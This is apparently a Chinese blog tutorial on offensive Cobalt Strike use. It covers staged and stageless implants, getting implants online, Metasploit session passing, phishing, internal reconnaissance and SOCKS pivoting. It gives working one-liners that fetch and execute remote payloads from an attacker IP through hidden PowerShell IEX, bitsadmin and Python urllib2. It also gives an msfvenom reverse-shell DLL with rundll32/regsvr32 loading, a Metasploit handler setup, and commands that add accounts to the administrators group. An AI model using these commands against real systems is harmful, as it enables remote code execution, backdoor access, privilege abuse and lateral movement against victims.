Cobalt Strike进阶用法1

有阶段木马和无阶段木马的区别

有阶段木马

无阶段木马

有阶段:木马中不含完整的payload,木马文件比较小,需要发初始化包,下载payload,再发送心跳包(小 马拉大车)

无阶段:木马中包含完整的payload,木马文件比较大,不需要发初始化包,直接发送心跳包

cs木马的上线方式

exe木马文件上线

略...前文有

office宏病毒上线

hta上线

web传递上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.16.39:80/test1'))"

cmd.exe /c bitsadmin /transfer c7d2 http://192.168.16.39:80/test2 %APPDATA%\c7d2.exe&%APPDATA%\c7d2.exe&del %APPDATA%\c7d2.exe

#需要目标windows安装python2 python -c "import urllib2; exec urllib2.urlopen('http://192.168.16.39:80/test3').read();"

shellcode生成木马上线

DLL木马上线

msf生成dll文件,木马上线

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=10.0.0.153 LPORT=6666 > reverse_32bit.dll

dll包含了一堆函数

rundll32.exe reverse_32bit.dll,re

regsvr32.exe reverse_32bit.dll

svchost.exe

结合metasploit,反弹shel 

在kali中开启使用命令开启metasploit,结合kali来反弹shell,也是可以的,那为什么要结合msf呢,因 为msf的功能也很强大,主机提权、各种攻击载荷、漏洞攻击等

msfconsole

如下,可以使用xshell来玩 

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 10.0.0.153

set lport 6666

run 

然后在CS中创建监听器 

使用Cobalt Strike创建一个windows/meterpreter/reverse_http的Listener。其中ip为Metasploit的ip地 址,端口为Metasploit所监听的端口。

然后选择增加会话

选择msf那个连接

然后再看msf,就成功了,我这里测试总是有点问题,后面再给大家补充最新的成功的图,流程没问题。

如果你发现在msf中输入指令没有效果,那么ctrl+c结束一下,然后通过sessions -i找到会话,继续通过 session -i id值,就可以了

也就是说,CS建立的连接会话可以派生到msf中,派生之后有个最大的有点就是,msf可以让这个会话在 后台运行,执行 background 指令,继续进行其他的攻击

cs的其他功能讲解

信息收集:

http://10.0.0.186:80/h1

 

智能攻击 applet攻击

自签名的applet攻击

网站克隆

文件下载

钓鱼邮件

cs自带的邮件钓鱼不好用,推荐使用Gophish邮件钓鱼平台

https://cloud.tencent.com/developer/article/1796781

cs的插件安装

 

内网渗透

内网渗透之信息收集

查看操作系统版本和补丁信息

win10

        cmd中输入:systeminfo,系统信息和补丁信息都有


linux:centos7

        查看系统版本

        cat /etc/redhat-release

        查看内核版本

        cat /proc/version uname -r

补丁情况:https://www.csdn.net/tags/NtzaggwsNjc0ODEtYmxvZwO0O0OO0O0O.html

系统查看用户和用户组

win10:

net user #查看所有账户

net user 用户名 #查看用户详细信息

net user 用户名 新密码 #给用户改密码(只有管理员可使用)

net user 用户名 密码 /add(/del) # 创建(删除)用户名和密码

net localgroup #列出所有组

net localgroup 组名 /add #新建组

net localgroup 组名 #查看该组成员

net localgroup administrators 用户名 /add(/del) # 把用户添加(把用户从组中删除)到 管理员组

net user 用户名 /active:yes #激活账户

net user 用户名 /active:no #禁用账户

linux:centos7

https://blog.csdn.net/erwange/article/details/104524602

useradd 用户名

userdel 用户名

usermod 用户名

cat /etc/passwd

lastlog

CS和msf配合做sock代理

先准备环境,需要准备三个虚拟机

kali在win2003上设置一个sock代理,用来访问win7。

首选给我们的win2003虚拟机再安装一个网卡

将第二个网卡单独划分一个网段中去

然后给第二张网卡设置ip地址,比如这是为10开头的地址

好,接下来将win7的网卡配置网段

给win7配置ip地址

那么此时win2003的第二张网卡和win7的网卡ip地址在同一个网段,互相能够ping通,kali和win2003的 第一张网卡在同一个网段,互相能够ping通,但是kali不能ping通win7的。

win7到win2003通畅:

win2003到win7通畅:

kali到win7,不通畅:

好,我们想让kali能够连通win7,那么就需要设置sock代理了

首先要先通过木马控制住win2003,这个我们已经会玩了,通过windows木马就能搞定,这里我就不演 示了,比如拿下的效果如下

第一步:设置代理端口

弹出如下窗口,默认即可,点击确定

第二步:查看已搭建代理

第三步:利用msf模块直接攻击

 我们msf的扫描功能,如果能够扫描到10网段的,那么表示成功了

成功了之后,表示kali能够正常和目标主机连接了,那么就可以使用kali的攻击载荷进行攻击拉取shell 了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无人问我余念安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值